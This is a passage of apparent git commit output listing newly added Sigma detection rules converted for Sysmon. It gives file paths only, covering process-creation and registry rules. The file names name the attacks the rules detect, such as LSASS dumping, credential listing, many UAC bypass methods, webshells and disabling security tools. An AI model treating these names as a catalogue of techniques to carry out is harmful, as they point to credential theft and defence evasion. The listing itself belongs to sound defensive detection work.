tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_image_missing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_network_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntds.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_parents.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_progname.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_service_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_service_dir.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_sysnative.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml create 
mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_workfolders.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_procdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tar_compression.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tar_extraction.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_taskkill_sep.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_taskmgr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_ieinstal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_trustedpath.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ultravnc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_w32tm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_chopper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_hacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_output.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_malware_netwire.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_malware_ursnif.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_add_local_hidden_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_apt_leviathan.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_apt_pandemic.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_hack_wce_reg.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_mal_azorult.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_net_ntlm_downgrade.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_office_test_regadd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_redmimicry_winnti_reg.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_runkey_winekey.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_runonce_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_add_port_monitor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml 